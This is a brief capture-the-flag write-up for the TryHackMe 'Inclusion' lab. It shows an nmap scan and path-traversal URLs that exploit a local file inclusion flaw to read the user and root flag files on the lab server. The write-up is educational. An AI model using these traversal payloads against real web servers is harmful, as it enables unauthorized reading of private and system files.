Inclusion

A beginner level LFI challenge

TryHackMe - Inclusion Created by falconfeast

Scanning (IP : 10.10.242.102)

NMAP

> nmap -sC -sV 10.10.242.102 > nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:20 EDT
Nmap scan report for 10.10.209.219
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.85 seconds

LFI parameter

On URL http://10.10.242.102/article?name=<FUZZ> You can view any existing file on the server.

© falconfeast 2020 gives the hint of user name as falconfeast.

user.txt : http://10.10.242.102/article?name=../../../../../home/falconfeast/user.txt

root.txt : http://10.10.242.102/article?name=../../../../../root/root.txt

PreviousTryHackMeNextOverpass

Last updated